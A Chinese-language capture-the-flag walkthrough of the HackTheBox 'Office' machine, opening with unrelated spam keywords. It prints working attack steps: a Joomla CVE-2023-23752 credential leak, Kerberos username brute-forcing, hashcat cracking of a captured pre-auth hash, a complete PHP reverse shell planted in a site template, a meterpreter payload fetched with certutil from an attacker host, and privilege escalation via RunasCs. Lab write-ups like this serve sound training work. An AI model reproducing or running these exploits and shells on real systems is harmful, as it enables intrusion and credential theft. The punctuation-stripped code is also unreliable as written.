合肥公司做网站,清远新闻最新,物流管理系统,上海服装集团网站建设端口扫描信息收集
使用nmap对靶机进行扫描
nmap -sC -sV 10.10.11.3开放了80端口#xff0c;并且注意到该ip对应的域名为office.htb#xff0c;将其加入到hosts文件中访问之 注意到扫描出来的还有robots文件#xff0c;经过尝试后只有administrator界面是可以访问的 …端口扫描信息收集
使用nmap对靶机进行扫描
nmap -sC -sV 10.10.11.3开放了80端口并且注意到该ip对应的域名为office.htb将其加入到hosts文件中访问之 注意到扫描出来的还有robots文件经过尝试后只有administrator界面是可以访问的 访问后发现是一个Joomla的登录界面 使用默认用户名密码登录尝试后发现登录失败使用joomscan判断joomla的版本查看是否存在漏洞
joomscan --url http://10.10.11.3joomla的版本为4.2.7存在Joomla未授权访问漏洞(CVE-2023-23752)利用方式为直接访问/api/index.php/v1/config/application?publictrue这里利用该漏洞 红框处有泄露用户名密码root/H0lOgrams4reTakIng0Ver754!
回想刚刚的端口扫描靶机没有开放ssh端口表示此处密码不能用于22端口但是开放了445端口或许这里是一个利用点 发现用户名密码不正确猜测可能是用户名不正确使用kerbrute对目标域名进行用户名爆破
./kerbrute userenum --dc 10.10.11.3 -d office.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt一个个尝试后发现用户dwolfe能够成功连接上
smbclient -L //10.10.11.3/ -U dwolfe%H0lOgrams4reTakIng0Ver754!逐个查看共享文件夹里边的内容在SOC Analysis文件夹中有一个pcap文件使用mget将其下载到本地
smbclient //10.10.11.3/SOC\ Analysis -U dwolfe%H0lOgrams4reTakIng0Ver754!不管是tcp或者是udp流都没有发现异常流量但是发现了存在Kerberos流量 注意到在第二个数据包中有如下敏感数据 此处可以使用hashcat来破解kerberos预认证数据包密码
首先能够注意到流量包中的加密模式为18并且wireshark告诉我们为SHA-256在https://hashcat.net/wiki/doku.php?idexample_hashes中我们能看到能够破解Kerberos的方式为7500但是7500模式中的加密模式为23而并非18继续查找发现19900模式同样能够破解Kerberos并且加密模式正好是18但是19900模式仅在beta模式中存在下载链接为https://hashcat.net/beta/
下载完成后输入以下命令
hashcat.exe -m 19900 $krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc rockyou.txt我们在密文之前传入的其他文本($krb5pa$18$tstark$OFFICE.HTB)是hashcat要使用的参数列表使用$符号分隔前两个只是该哈希类型的hashcat格式的一部分。 Krb5pa表示kerberos5预身份验证18表示kerberos加密类型18(AES-256)tstark表示用户名可以在流量包中的其他位置找到OFFICE.HTB表示域名同样可以在流量包中的其他位置找到均在上图中标注出来了 破解出来的密码在原字符串的末尾为playboy69
回到joomla的登录界面尝试使用tstark/playboy69登录发现还是不能登录将playboy69作为定量使用burpsuite进行爆破结果爆破出用户名为administrator-_-|| 进入界面后查找功能点发现存在system-site Templates能够修改主页代码 直接将error.php的界面改为一段反弹shell的代码
?php
// Copyright (c) 2020 Ivan Šincek
// v2.6
// Requires PHP v5.0.0 or greater.
// Works on Linux OS, macOS, and Windows OS.
// See the original script at https://github.com/pentestmonkey/php-reverse-shell.
class Shell {private $addr null;private $port null;private $os null;private $shell null;private $descriptorspec array(0 array(pipe, r), // shell can read from STDIN1 array(pipe, w), // shell can write to STDOUT2 array(pipe, w) // shell can write to STDERR);private $buffer 1024; // read/write buffer sizeprivate $clen 0; // command lengthprivate $error false; // stream read/write errorprivate $sdump true; // scripts dumppublic function __construct($addr, $port) {$this-addr $addr;$this-port $port;}private function detect() {$detected true;$os PHP_OS;if (stripos($os, LINUX) ! false || stripos($os, DARWIN) ! false) {$this-os LINUX;$this-shell /bin/sh;} else if (stripos($os, WINDOWS) ! false || stripos($os, WINNT) ! false || stripos($os, WIN32) ! false) {$this-os WINDOWS;$this-shell cmd.exe;} else {$detected false;echo SYS_ERROR: Underlying operating system is not supported, script will now exit...\n;}return $detected;}private function daemonize() {$exit false;if (!function_exists(pcntl_fork)) {echo DAEMONIZE: pcntl_fork() does not exists, moving on...\n;} else if (($pid pcntl_fork()) 0) {echo DAEMONIZE: Cannot fork off the parent process, moving on...\n;} else if ($pid 0) {$exit true;echo DAEMONIZE: Child process forked off successfully, parent process will now exit...\n;// once daemonized, you will actually no longer see the scripts dump} else if (posix_setsid() 0) {echo DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n;} else {echo DAEMONIZE: Completed successfully!\n;}return $exit;}private function settings() {error_reporting(0);set_time_limit(0); // do not impose the script execution time limitumask(0); // set the file/directory permissions - 666 for files and 777 for directories}private function dump($data) {if ($this-sdump) {$data str_replace(, lt;, $data);$data str_replace(, gt;, $data);echo $data;}}private function read($stream, $name, $buffer) {if (($data fread($stream, $buffer)) false) { // suppress an error when reading from a closed blocking stream$this-error true; // set the global error flagecho STRM_ERROR: Cannot read from {$name}, script will now exit...\n;}return $data;}private function write($stream, $name, $data) {if (($bytes fwrite($stream, $data)) false) { // suppress an error when writing to a closed blocking stream$this-error true; // set the global error flagecho STRM_ERROR: Cannot write to {$name}, script will now exit...\n;}return $bytes;}// read/write method for non-blocking streamsprivate function rw($input, $output, $iname, $oname) {while (($data $this-read($input, $iname, $this-buffer)) $this-write($output, $oname, $data)) {if ($this-os WINDOWS $oname STDIN) { $this-clen strlen($data); } // calculate the command length$this-dump($data); // scripts dump}}// read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)// we must read the exact byte length from a stream and not a single byte moreprivate function brw($input, $output, $iname, $oname) {$size fstat($input)[size];if ($this-os WINDOWS $iname STDOUT $this-clen) {// for some reason Windows OS pipes STDIN into STDOUT// we do not like that// so we need to discard the data from the streamwhile ($this-clen 0 ($bytes $this-clen $this-buffer ? $this-buffer : $this-clen) $this-read($input, $iname, $bytes)) {$this-clen - $bytes;$size - $bytes;}}while ($size 0 ($bytes $size $this-buffer ? $this-buffer : $size) ($data $this-read($input, $iname, $bytes)) $this-write($output, $oname, $data)) {$size - $bytes;$this-dump($data); // scripts dump}}public function run() {if ($this-detect() !$this-daemonize()) {$this-settings();// ----- SOCKET BEGIN -----$socket fsockopen($this-addr, $this-port, $errno, $errstr, 30);if (!$socket) {echo SOC_ERROR: {$errno}: {$errstr}\n;} else {stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns true on Windows OS// ----- SHELL BEGIN -----$process proc_open($this-shell, $this-descriptorspec, $pipes, null, null);if (!$process) {echo PROC_ERROR: Cannot start the shell\n;} else {foreach ($pipes as $pipe) {stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns false on Windows OS}// ----- WORK BEGIN -----$status proc_get_status($process);fwrite($socket, SOCKET: Shell has connected! PID: {$status[pid]}\n);do {$status proc_get_status($process);if (feof($socket)) { // check for end-of-file on SOCKETecho SOC_ERROR: Shell connection has been terminated\n; break;} else if (feof($pipes[1]) || !$status[running]) { // check for end-of-file on STDOUT or if process is still runningecho PROC_ERROR: Shell process has been terminated\n; break; // feof() does not work with blocking streams} // use proc_get_status() instead$streams array(read array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERRwrite null,except null);$num_changed_streams stream_select($streams[read], $streams[write], $streams[except], 0); // wait for stream changes | will not wait on Windows OSif ($num_changed_streams false) {echo STRM_ERROR: stream_select() failed\n; break;} else if ($num_changed_streams 0) {if ($this-os LINUX) {if (in_array($socket , $streams[read])) { $this-rw($socket , $pipes[0], SOCKET, STDIN ); } // read from SOCKET and write to STDINif (in_array($pipes[2], $streams[read])) { $this-rw($pipes[2], $socket , STDERR, SOCKET); } // read from STDERR and write to SOCKETif (in_array($pipes[1], $streams[read])) { $this-rw($pipes[1], $socket , STDOUT, SOCKET); } // read from STDOUT and write to SOCKET} else if ($this-os WINDOWS) {// order is importantif (in_array($socket, $streams[read])/*------*/) { $this-rw ($socket , $pipes[0], SOCKET, STDIN ); } // read from SOCKET and write to STDINif (($fstat fstat($pipes[2])) $fstat[size]) { $this-brw($pipes[2], $socket , STDERR, SOCKET); } // read from STDERR and write to SOCKETif (($fstat fstat($pipes[1])) $fstat[size]) { $this-brw($pipes[1], $socket , STDOUT, SOCKET); } // read from STDOUT and write to SOCKET}}} while (!$this-error);// ------ WORK END ------foreach ($pipes as $pipe) {fclose($pipe);}proc_close($process);}// ------ SHELL END ------fclose($socket);}// ------ SOCKET END ------}}
}
echo pre;
// change the host address and/or port number as necessary
$sh new Shell(IP,PORT);
$sh-run();
unset($sh);
// garbage collector requires PHP v5.3.0 or greater
// gc_collect_cycles();
echo /pre;
?修改完成后保存访问该界面 拿到shell
权限提升
查看当前用户权限 发现还不是用户权限先想办法提升到用户权限查看靶机中有哪些用户 发现有之前爆破出密码的tstark用户使用RunasCs进行提权先使用msfvenom生成一个payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST[IP] LPORT[PORT] -f exe -o payload.exe将本地的RunasCs和payload上传到靶机
certutil.exe -urlcache -split -f http://10.10.14.2:8989/RunasCs.exe
certutil.exe -urlcache -split -f http://10.10.14.2:8989/payload.exe使用RunasCs以tstark用户运行payload.exe并且在msfconsole开启监听
RunasCs.exe tstark playboy69 payload.exe成功拿到用户权限
-------------------------------root权限待更新-------------------------------
